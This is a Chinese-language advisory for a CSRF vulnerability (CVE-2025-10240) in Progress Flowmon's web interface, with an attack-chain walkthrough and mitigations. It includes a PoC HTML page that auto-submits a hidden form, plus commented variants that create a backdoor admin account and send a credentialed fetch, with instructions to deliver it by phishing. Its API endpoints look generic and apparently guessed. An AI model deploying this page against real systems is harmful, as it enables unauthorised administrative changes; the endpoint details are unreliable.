CVE-2025-10240 Progress Flowmon Web应用CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-10240

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Progress Flowmon

漏洞概述

CVE-2025-10240是Progress公司旗下Flowmon网络流量监控与分析平台Web应用程序中存在的一个跨站请求伪造（CSRF）漏洞。该漏洞影响12.5.5版本之前的所有Flowmon Web应用。攻击者可以通过构造恶意的链接或网页，诱导已通过身份认证的合法用户点击。当受害者在已登录Flowmon Web管理界面的会话中点击该恶意链接时，浏览器会自动携带用户的会话凭证（如Cookie）向Flowmon服务器发送请求，从而在用户不知情的情况下执行未授权的操作。由于该漏洞的网络攻击向量为远程（AV:N）、攻击复杂度低（AC:L）且不需要特权（PR:N），但需要用户交互（UI:R），攻击者可以利用社会工程学手段（如钓鱼邮件、即时消息等）广泛传播恶意链接。一旦成功利用，攻击者可对系统的机密性、完整性和可用性均造成高影响，可能导致敏感网络监控数据泄露、配置被恶意篡改、服务中断等严重后果。该漏洞由Progress公司安全团队（[email protected]）发现并报告，并于2025年10月9日正式公开披露。Progress公司已在12.5.5版本中修复了该问题，建议所有用户尽快升级至最新版本以消除安全风险。

技术细节

该漏洞的核心原理在于Progress Flowmon Web应用程序未对敏感操作请求实施充分的CSRF防护机制（如CSRF Token验证、SameSite Cookie属性、Referer检查等）。具体技术细节如下：

1. **缺乏CSRF Token验证**：Flowmon Web应用在处理关键管理操作（如配置修改、用户管理、数据导出等）时，未在请求中要求包含不可预测的CSRF Token，攻击者可以预先构造包含恶意操作的HTTP请求。

2. **会话凭证自动携带**：当用户在浏览器中已登录Flowmon Web管理界面后，浏览器会自动在后续请求中携带认证Cookie。攻击者利用这一特性，通过诱导用户访问恶意页面（如<img src="http://target-flowmon/api/config?action=delete">或表单自动提交），使浏览器以用户身份向Flowmon服务器发送跨域请求。

3. **同源策略绕过**：由于是简单的HTTP GET或POST请求，浏览器将其视为合法请求发送至目标服务器，服务器端无法区分该请求是用户主动发起还是被恶意页面诱导发起。

4. **利用方式**：攻击者首先需要通过钓鱼邮件、社交媒体或即时通讯工具向目标管理员发送特制的恶意链接。链接可以是一个看似正常的网页，其中嵌入了自动提交的表单或隐藏的iframe。当管理员在已登录Flowmon的状态下点击该链接，恶意请求将以管理员权限执行。攻击者可执行的操作包括但不限于：修改网络监控配置、删除关键监控数据、创建后门账户、导出敏感网络拓扑信息等。

攻击链分析

STEP 1

步骤1：侦察与目标识别

攻击者首先识别目标组织是否使用Progress Flowmon网络监控平台，通过Shodan、Censys等网络空间搜索引擎或公开信息收集目标信息，确定Flowmon Web管理界面的URL和端口。

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含CSRF利用代码的恶意HTML页面，该页面包含自动提交的表单或隐藏的iframe，目标URL指向Flowmon Web应用的敏感操作接口（如配置修改、用户管理等）。

STEP 3

步骤3：社工钓鱼投递

攻击者通过钓鱼邮件、企业即时通讯工具或社交媒体向Flowmon管理员发送包含恶意链接的消息，诱导管理员点击。链接伪装成正常的业务通知、系统告警或安全公告。

STEP 4

步骤4：触发CSRF攻击

管理员在浏览器中已登录Flowmon Web管理界面的状态下点击恶意链接，浏览器自动携带认证Cookie向Flowmon服务器发送恶意请求，服务器将其视为合法操作执行。

STEP 5

步骤5：未授权操作执行

恶意请求以管理员权限执行，攻击者可完成配置篡改、数据泄露、权限提升或植入后门等操作，对网络监控系统的完整性和机密性造成严重损害。

STEP 6

步骤6：持久化与横向移动

攻击者利用获取的权限创建后门账户或修改系统配置，实现持久化访问，并可能利用Flowmon在网络中的位置进行进一步的横向移动，访问其他内部网络资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10240 - Progress Flowmon CSRF PoC
# This PoC demonstrates how an attacker can craft a malicious HTML page
# that triggers unintended actions when a logged-in Flowmon admin visits it.

<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait while we process your request...</h1>

    <!-- Method 1: Auto-submitting hidden form (POST-based CSRF) -->
    <form id="csrf-form" action="http://target-flowmon:443/api/v1/config" method="POST" style="display:none;">
        <input type="hidden" name="action" value="modify" />
        <input type="hidden" name="setting" value="alert_threshold" />
        <input type="hidden" name="value" value="0" />
        <input type="submit" value="Submit" />
    </form>

    <script>
        // Auto-submit the form when the page loads
        document.getElementById('csrf-form').submit();
    </script>

    <!-- Method 2: Image-based GET CSRF (simpler approach) -->
    <!-- <img src="http://target-flowmon:443/api/v1/admin/users/create?username=attacker&password=pwned&role=admin" style="display:none;" /> -->

    <!-- Method 3: Fetch-based CSRF (modern browsers) -->
    <!--
    <script>
        fetch('http://target-flowmon:443/api/v1/config', {
            method: 'POST',
            credentials: 'include',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({
                action: 'modify',
                setting: 'alert_threshold',
                value: 0
            })
        });
    </script>
    -->
</body>
</html>

# Usage:
# 1. Host this HTML on an attacker-controlled server
# 2. Send the link to a logged-in Flowmon administrator via phishing
# 3. When admin clicks the link, the malicious request executes with their session

影响范围

Progress Flowmon < 12.5.5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Flowmon Web管理界面的网络访问范围，仅允许可信管理终端通过VPN或堡垒机访问；2）在反向代理或WAF上配置规则，阻止来自外部网络的CSRF特征请求（如缺少CSRF Token的POST请求）；3）为管理员账户启用多因素认证（MFA），即使CSRF攻击成功也需要额外的认证因素；4）密切监控系统日志，及时发现异常的未授权操作；5）尽快安排升级至Flowmon 12.5.5或更高版本以彻底修复该漏洞。